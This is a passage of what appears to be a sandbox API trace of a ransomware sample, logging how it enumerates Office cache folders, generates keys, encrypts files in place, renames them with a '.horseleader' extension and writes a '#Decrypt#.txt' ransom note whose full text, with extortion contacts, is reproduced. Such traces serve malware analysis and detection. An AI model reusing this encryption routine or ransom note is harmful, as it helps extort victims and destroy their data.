returned 11 [0133.564] StrStrW (lpFirst="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\ExcelMUI.xml", lpSrch=".testttjffg") returned 0x0 [0133.564] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aef88 | out: pbBuffer=0x32aef88) returned 1 [0133.565] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aef88*, pdwDataLen=0x32af044*=0x24, dwBufLen=0x80 | out: pbData=0x32aef88*, pdwDataLen=0x32af044*=0x80) returned 1 [0133.565] CreateFileW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\ExcelMUI.xml" (normalized: "c:\\msocache\\all users\\{90140000-0016-0409-1000-0000000ff1ce}-c\\excelmui.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x21c [0133.565] lstrlenW (lpString="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\ExcelMUI.xml") returned 79 [0133.565] StrStrW (lpFirst="ExcelMUI.xml", lpSrch=".txt") returned 0x0 [0133.566] GetFileSizeEx (in: hFile=0x21c, lpFileSize=0x32af048 | out: lpFileSize=0x32af048*=1565) returned 1 [0133.566] ReadFile (in: hFile=0x21c, lpBuffer=0x32a9f88, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32af06c, lpOverlapped=0x0 | out: lpBuffer=0x32a9f88*, lpNumberOfBytesRead=0x32af06c*=0x61d, lpOverlapped=0x0) returned 1 [0133.568] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0xfffff9e3, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0133.568] WriteFile (in: hFile=0x21c, lpBuffer=0x32a9f88*, nNumberOfBytesToWrite=0x61d, lpNumberOfBytesWritten=0x32af06c, lpOverlapped=0x0 | out: lpBuffer=0x32a9f88*, lpNumberOfBytesWritten=0x32af06c*=0x61d, lpOverlapped=0x0) returned 1 [0133.568] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0133.569] WriteFile (in: hFile=0x21c, 
lpBuffer=0x32af040*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x32af06c, lpOverlapped=0x0 | out: lpBuffer=0x32af040*, lpNumberOfBytesWritten=0x32af06c*=0x4, lpOverlapped=0x0) returned 1 [0133.569] WriteFile (in: hFile=0x21c, lpBuffer=0x32aef88*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x32af06c, lpOverlapped=0x0 | out: lpBuffer=0x32aef88*, lpNumberOfBytesWritten=0x32af06c*=0x80, lpOverlapped=0x0) returned 1 [0133.569] CloseHandle (hObject=0x21c) returned 1 [0133.571] GetProcessHeap () returned 0x780000 [0133.571] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7b49c8 [0133.571] wnsprintfW (in: pszDest=0x7b49c8, cchDest=1024, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\ExcelMUI.xml.horseleader") returned 91 [0133.572] MoveFileW (lpExistingFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\ExcelMUI.xml" (normalized: "c:\\msocache\\all users\\{90140000-0016-0409-1000-0000000ff1ce}-c\\excelmui.xml"), lpNewFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\ExcelMUI.xml.horseleader" (normalized: "c:\\msocache\\all users\\{90140000-0016-0409-1000-0000000ff1ce}-c\\excelmui.xml.horseleader")) returned 1 [0133.572] GetProcessHeap () returned 0x780000 [0133.573] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7b49c8 | out: hHeap=0x780000) returned 1 [0133.573] FindNextFileW (in: hFindFile=0x7c67a0, lpFindFileData=0x32af090 | out: lpFindFileData=0x32af090*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x43f88c00, ftCreationTime.dwHighDateTime=0x1cad04a, ftLastAccessTime.dwLowDateTime=0x43f88c00, ftLastAccessTime.dwHighDateTime=0x1cad04a, ftLastWriteTime.dwLowDateTime=0xee38cbf0, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x8f8, dwReserved0=0xdded3805, dwReserved1=0xda7b4a6d, cFileName="Setup.xml", cAlternateFileName="")) returned 1 [0133.573] lstrcmpiW 
(lpString1="Setup.xml", lpString2="Windows") returned -1 [0133.573] wnsprintfW (in: pszDest=0x7b3178, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\Setup.xml") returned 76 [0133.573] StrStrIW (lpFirst="Setup.xml", lpSrch=".horseleader") returned 0x0 [0133.573] lstrcmpW (lpString1="Setup.xml", lpString2="#Decrypt#.txt") returned 1 [0133.573] lstrcmpW (lpString1="Setup.xml", lpString2="_uninstalling_.png") returned 1 [0133.573] lstrlenW (lpString=".testttjffg") returned 11 [0133.573] StrStrW (lpFirst="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".testttjffg") returned 0x0 [0133.574] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aef88 | out: pbBuffer=0x32aef88) returned 1 [0133.574] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aef88*, pdwDataLen=0x32af044*=0x24, dwBufLen=0x80 | out: pbData=0x32aef88*, pdwDataLen=0x32af044*=0x80) returned 1 [0133.574] CreateFileW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\Setup.xml" (normalized: "c:\\msocache\\all users\\{90140000-0016-0409-1000-0000000ff1ce}-c\\setup.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x21c [0133.575] lstrlenW (lpString="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\Setup.xml") returned 76 [0133.575] StrStrW (lpFirst="Setup.xml", lpSrch=".txt") returned 0x0 [0133.575] GetFileSizeEx (in: hFile=0x21c, lpFileSize=0x32af048 | out: lpFileSize=0x32af048*=2296) returned 1 [0133.576] ReadFile (in: hFile=0x21c, lpBuffer=0x32a9f88, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32af06c, lpOverlapped=0x0 | out: lpBuffer=0x32a9f88*, lpNumberOfBytesRead=0x32af06c*=0x8f8, lpOverlapped=0x0) returned 1 [0133.578] SetFilePointerEx (in: hFile=0x21c, 
liDistanceToMove=0xfffff708, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0133.578] WriteFile (in: hFile=0x21c, lpBuffer=0x32a9f88*, nNumberOfBytesToWrite=0x8f8, lpNumberOfBytesWritten=0x32af06c, lpOverlapped=0x0 | out: lpBuffer=0x32a9f88*, lpNumberOfBytesWritten=0x32af06c*=0x8f8, lpOverlapped=0x0) returned 1 [0133.578] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0133.578] WriteFile (in: hFile=0x21c, lpBuffer=0x32af040*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x32af06c, lpOverlapped=0x0 | out: lpBuffer=0x32af040*, lpNumberOfBytesWritten=0x32af06c*=0x4, lpOverlapped=0x0) returned 1 [0133.579] WriteFile (in: hFile=0x21c, lpBuffer=0x32aef88*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x32af06c, lpOverlapped=0x0 | out: lpBuffer=0x32aef88*, lpNumberOfBytesWritten=0x32af06c*=0x80, lpOverlapped=0x0) returned 1 [0133.579] CloseHandle (hObject=0x21c) returned 1 [0133.592] GetProcessHeap () returned 0x780000 [0133.592] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7b49c8 [0133.592] wnsprintfW (in: pszDest=0x7b49c8, cchDest=1024, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\Setup.xml.horseleader") returned 88 [0133.592] MoveFileW (lpExistingFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\Setup.xml" (normalized: "c:\\msocache\\all users\\{90140000-0016-0409-1000-0000000ff1ce}-c\\setup.xml"), lpNewFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\Setup.xml.horseleader" (normalized: "c:\\msocache\\all users\\{90140000-0016-0409-1000-0000000ff1ce}-c\\setup.xml.horseleader")) returned 1 [0133.593] GetProcessHeap () returned 0x780000 [0133.593] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7b49c8 | out: hHeap=0x780000) returned 1 [0133.593] FindNextFileW (in: 
hFindFile=0x7c67a0, lpFindFileData=0x32af090 | out: lpFindFileData=0x32af090*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x43f88c00, ftCreationTime.dwHighDateTime=0x1cad04a, ftLastAccessTime.dwLowDateTime=0x43f88c00, ftLastAccessTime.dwHighDateTime=0x1cad04a, ftLastWriteTime.dwLowDateTime=0xee38cbf0, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x8f8, dwReserved0=0xdded3805, dwReserved1=0xda7b4a6d, cFileName="Setup.xml", cAlternateFileName="")) returned 0 [0133.593] FindClose (in: hFindFile=0x7c67a0 | out: hFindFile=0x7c67a0) returned 1 [0133.594] wnsprintfW (in: pszDest=0x7b3178, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\#Decrypt#.txt") returned 80 [0133.594] CreateFileW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\#Decrypt#.txt" (normalized: "c:\\msocache\\all users\\{90140000-0016-0409-1000-0000000ff1ce}-c\\#decrypt#.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1cc [0133.594] lstrlenA (lpString="All your files have been ENCRYPTED!!!\r\nWrite to our ICQ @Horseleader\r\nOr contact us via jabber - horseleader@xmpp.jp\r\nJabber client installation instructions:\r\nDownload the jabber (Pidgin) client from https://pidgin.im/download/windows/ \r\n\r\nAfter installation, the Pidgin client will prompt you to create a new account. 
\r\nClick - Add\r\nIn the -Protocol field, select XMPP \r\nIn -Username - come up with any name \r\nIn the field -domain - enter any jabber-server, there are a lot of them, for example - exploit.im \r\nCreate a password\r\nAt the bottom, put a tick -Create account \r\nClick add \r\nIf you selected -domain - exploit.im, then a new window should appear in which you will need to re-enter your data: \r\nUser \r\npassword \r\nYou will need to follow the link to the captcha (there you will see the characters that you need to enter in the field below) \r\nIf you don't understand our Pidgin client installation instructions, you can find many installation tutorials on youtube - https://www.youtube.com/results?search_query=pidgin+jabber+install \r\nIf you have not received a response from us then we may have technical problems and please write to us using Jaber here bigbosshorse@xmpp.jp or on icq \r\nAttention!\r\nDo not rename encrypted files. \r\nDo not try to decrypt your data using third party software, it may cause permanent data loss. \r\nDecryption of your files with the help of third parties may cause increased price (they add their fee to our) or you can become a victim of a scam. 
\r\ntell your unique ID\r\n") returned 1508 [0133.594] WriteFile (in: hFile=0x1cc, lpBuffer=0xb41ca0*, nNumberOfBytesToWrite=0x5e4, lpNumberOfBytesWritten=0x32af088, lpOverlapped=0x0 | out: lpBuffer=0xb41ca0*, lpNumberOfBytesWritten=0x32af088*=0x5e4, lpOverlapped=0x0) returned 1 [0133.596] lstrlenA (lpString="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") returned 1368 [0133.596] WriteFile (in: hFile=0x1cc, lpBuffer=0x7d1740*, nNumberOfBytesToWrite=0x558, lpNumberOfBytesWritten=0x32af088, lpOverlapped=0x0 | out: lpBuffer=0x7d1740*, lpNumberOfBytesWritten=0x32af088*=0x558, lpOverlapped=0x0) returned 1 [0133.596] CloseHandle (hObject=0x1cc) returned 1 [0133.596] GetProcessHeap () returned 0x780000 [0133.596] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7b3178 | out: hHeap=0x780000) returned 1 [0133.597] FindNextFileW (in: hFindFile=0x7c6720, lpFindFileData=0x32af308 | out: lpFindFileData=0x32af308*(dwFileAttributes=0x2011, ftCreationTime.dwLowDateTime=0xe8729610, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xecdfa490, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0xecdfa490, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x5b02f5ca, dwReserved1=0x2fe4dac2, cFileName="{90140000-0018-0409-1000-0000000FF1CE}-C", cAlternateFileName="{90140~2")) returned 1 [0133.597] lstrcmpiW (lpString1="{90140000-0018-0409-1000-0000000FF1CE}-C", lpString2="Windows") returned -1 [0133.597] wnsprintfW (in: pszDest=0x7c8598, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C") returned 66 [0133.597] lstrcmpW (lpString1="{90140000-0018-0409-1000-0000000FF1CE}-C", lpString2=".") returned 1 [0133.597] lstrcmpW (lpString1="{90140000-0018-0409-1000-0000000FF1CE}-C", lpString2="..") returned 1 [0133.597] lstrcmpW (lpString1="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C", 
lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned -1 [0133.597] GetProcessHeap () returned 0x780000 [0133.597] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x79a620 [0133.597] wnsprintfW (in: pszDest=0x79a620, cchDest=1024, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\*") returned 68 [0133.597] FindFirstFileW (in: lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\*", lpFindFileData=0x32af090 | out: lpFindFileData=0x32af090*(dwFileAttributes=0x2011, ftCreationTime.dwLowDateTime=0xe8729610, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xecdfa490, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0xecdfa490, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xdded3805, dwReserved1=0xda7b4a6d, cFileName=".", cAlternateFileName="")) returned 0x7c67a0 [0135.517] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0135.517] wnsprintfW (in: pszDest=0x79a620, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\.") returned 68 [0135.517] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0135.517] StrStrIW (lpFirst=".", lpSrch=".horseleader") returned 0x0 [0135.518] lstrcmpW (lpString1=".", lpString2="#Decrypt#.txt") returned 1 [0135.518] lstrcmpW (lpString1=".", lpString2="_uninstalling_.png") returned -1 [0135.518] lstrlenW (lpString=".testttjffg") returned 11 [0135.518] StrStrW (lpFirst="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\.", lpSrch=".testttjffg") returned 0x0 [0135.518] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aef88 | out: pbBuffer=0x32aef88) returned 1 [0135.518] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aef88*, pdwDataLen=0x32af044*=0x24, dwBufLen=0x80 | out: pbData=0x32aef88*, 
pdwDataLen=0x32af044*=0x80) returned 1 [0135.556] CreateFileW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\." (normalized: "c:\\msocache\\all users\\{90140000-0018-0409-1000-0000000ff1ce}-c\\."), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0135.557] FindNextFileW (in: hFindFile=0x7c67a0, lpFindFileData=0x32af090 | out: lpFindFileData=0x32af090*(dwFileAttributes=0x2011, ftCreationTime.dwLowDateTime=0xe8729610, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xecdfa490, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0xecdfa490, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xdded3805, dwReserved1=0xda7b4a6d, cFileName="..", cAlternateFileName="")) returned 1 [0135.557] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0135.557] wnsprintfW (in: pszDest=0x79a620, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\..") returned 69 [0135.557] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0135.557] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0135.557] StrStrIW (lpFirst="..", lpSrch=".horseleader") returned 0x0 [0135.557] lstrcmpW (lpString1="..", lpString2="#Decrypt#.txt") returned 1 [0135.557] lstrcmpW (lpString1="..", lpString2="_uninstalling_.png") returned -1 [0135.557] lstrlenW (lpString=".testttjffg") returned 11 [0135.558] StrStrW (lpFirst="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\..", lpSrch=".testttjffg") returned 0x0 [0135.558] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aef88 | out: pbBuffer=0x32aef88) returned 1 [0135.658] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aef88*, pdwDataLen=0x32af044*=0x24, dwBufLen=0x80 | out: 
pbData=0x32aef88*, pdwDataLen=0x32af044*=0x80) returned 1 [0135.659] CreateFileW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\.." (normalized: "c:\\msocache\\all users"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0135.659] FindNextFileW (in: hFindFile=0x7c67a0, lpFindFileData=0x32af090 | out: lpFindFileData=0x32af090*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x3e02ab00, ftCreationTime.dwHighDateTime=0x1cad04a, ftLastAccessTime.dwLowDateTime=0x3e02ab00, ftLastAccessTime.dwHighDateTime=0x1cad04a, ftLastWriteTime.dwLowDateTime=0xe874f770, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x263400, dwReserved0=0xdded3805, dwReserved1=0xda7b4a6d, cFileName="PowerPointMUI.msi", cAlternateFileName="POWERP~1.MSI")) returned 1 [0135.659] lstrcmpiW (lpString1="PowerPointMUI.msi", lpString2="Windows") returned -1 [0135.659] wnsprintfW (in: pszDest=0x79a620, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\PowerPointMUI.msi") returned 84 [0135.659] StrStrIW (lpFirst="PowerPointMUI.msi", lpSrch=".horseleader") returned 0x0 [0135.659] lstrcmpW (lpString1="PowerPointMUI.msi", lpString2="#Decrypt#.txt") returned 1 [0135.660] lstrcmpW (lpString1="PowerPointMUI.msi", lpString2="_uninstalling_.png") returned 1 [0135.660] lstrlenW (lpString=".testttjffg") returned 11 [0135.660] StrStrW (lpFirst="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\PowerPointMUI.msi", lpSrch=".testttjffg") returned 0x0 [0135.660] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aef88 | out: pbBuffer=0x32aef88) returned 1 [0135.716] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aef88*, pdwDataLen=0x32af044*=0x24, dwBufLen=0x80 | out: pbData=0x32aef88*, 
pdwDataLen=0x32af044*=0x80) returned 1 [0135.716] CreateFileW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\PowerPointMUI.msi" (normalized: "c:\\msocache\\all users\\{90140000-0018-0409-1000-0000000ff1ce}-c\\powerpointmui.msi"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x21c [0135.716] lstrlenW (lpString="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\PowerPointMUI.msi") returned 84 [0135.716] StrStrW (lpFirst="PowerPointMUI.msi", lpSrch=".txt") returned 0x0 [0135.717] GetFileSizeEx (in: hFile=0x21c, lpFileSize=0x32af048 | out: lpFileSize=0x32af048*=2503680) returned 1 [0135.717] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0135.717] ReadFile (in: hFile=0x21c, lpBuffer=0x32a9f88, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32af06c, lpOverlapped=0x0 | out: lpBuffer=0x32a9f88*, lpNumberOfBytesRead=0x32af06c*=0x5000, lpOverlapped=0x0) returned 1 [0135.726] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0135.726] WriteFile (in: hFile=0x21c, lpBuffer=0x32a9f88*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32af06c, lpOverlapped=0x0 | out: lpBuffer=0x32a9f88*, lpNumberOfBytesWritten=0x32af06c*=0x5000, lpOverlapped=0x0) returned 1 [0135.727] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0x12f200, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0135.727] ReadFile (in: hFile=0x21c, lpBuffer=0x32a9f88, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32af06c, lpOverlapped=0x0 | out: lpBuffer=0x32a9f88*, lpNumberOfBytesRead=0x32af06c*=0x5000, lpOverlapped=0x0) returned 1 [0135.731] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0xffffb000, 
lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0135.731] WriteFile (in: hFile=0x21c, lpBuffer=0x32a9f88*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32af06c, lpOverlapped=0x0 | out: lpBuffer=0x32a9f88*, lpNumberOfBytesWritten=0x32af06c*=0x5000, lpOverlapped=0x0) returned 1 [0135.732] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0x25e400, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0135.732] ReadFile (in: hFile=0x21c, lpBuffer=0x32a9f88, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32af06c, lpOverlapped=0x0 | out: lpBuffer=0x32a9f88*, lpNumberOfBytesRead=0x32af06c*=0x5000, lpOverlapped=0x0) returned 1 [0135.736] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0135.736] WriteFile (in: hFile=0x21c, lpBuffer=0x32a9f88*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32af06c, lpOverlapped=0x0 | out: lpBuffer=0x32a9f88*, lpNumberOfBytesWritten=0x32af06c*=0x5000, lpOverlapped=0x0) returned 1 [0135.737] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0135.737] WriteFile (in: hFile=0x21c, lpBuffer=0x32af040*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x32af06c, lpOverlapped=0x0 | out: lpBuffer=0x32af040*, lpNumberOfBytesWritten=0x32af06c*=0x4, lpOverlapped=0x0) returned 1 [0135.737] WriteFile (in: hFile=0x21c, lpBuffer=0x32aef88*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x32af06c, lpOverlapped=0x0 | out: lpBuffer=0x32aef88*, lpNumberOfBytesWritten=0x32af06c*=0x80, lpOverlapped=0x0) returned 1 [0135.737] CloseHandle (hObject=0x21c) returned 1 [0136.298] GetProcessHeap () returned 0x780000 [0136.299] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7dc020 [0136.299] wnsprintfW (in: pszDest=0x7dc020, cchDest=1024, 
pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\PowerPointMUI.msi.horseleader") returned 96 [0136.299] MoveFileW (lpExistingFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\PowerPointMUI.msi" (normalized: "c:\\msocache\\all users\\{90140000-0018-0409-1000-0000000ff1ce}-c\\powerpointmui.msi"), lpNewFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\PowerPointMUI.msi.horseleader" (normalized: "c:\\msocache\\all users\\{90140000-0018-0409-1000-0000000ff1ce}-c\\powerpointmui.msi.horseleader")) returned 1 [0136.301] GetProcessHeap () returned 0x780000 [0136.301] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7dc020 | out: hHeap=0x780000) returned 1 [0136.301] FindNextFileW (in: hFindFile=0x7c67a0, lpFindFileData=0x32af090 | out: lpFindFileData=0x32af090*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x4529b900, ftCreationTime.dwHighDateTime=0x1cad04a, ftLastAccessTime.dwLowDateTime=0x4529b900, ftLastAccessTime.dwHighDateTime=0x1cad04a, ftLastWriteTime.dwLowDateTime=0xe8728670, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x5aa, dwReserved0=0xdded3805, dwReserved1=0xda7b4a6d, cFileName="PowerPointMUI.xml", cAlternateFileName="POWERP~1.XML")) returned 1 [0136.301] lstrcmpiW (lpString1="PowerPointMUI.xml", lpString2="Windows") returned -1 [0136.301] wnsprintfW (in: pszDest=0x79a620, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\PowerPointMUI.xml") returned 84 [0136.302] StrStrIW (lpFirst="PowerPointMUI.xml", lpSrch=".horseleader") returned 0x0 [0136.302] lstrcmpW (lpString1="PowerPointMUI.xml", lpString2="#Decrypt#.txt") returned 1 [0136.302] lstrcmpW (lpString1="PowerPointMUI.xml", lpString2="_uninstalling_.png") returned 1 [0136.302] lstrlenW (lpString=".testttjffg") returned 11 [0136.302] StrStrW (lpFirst="\\\\?\\C:\\MSOCache\\All 
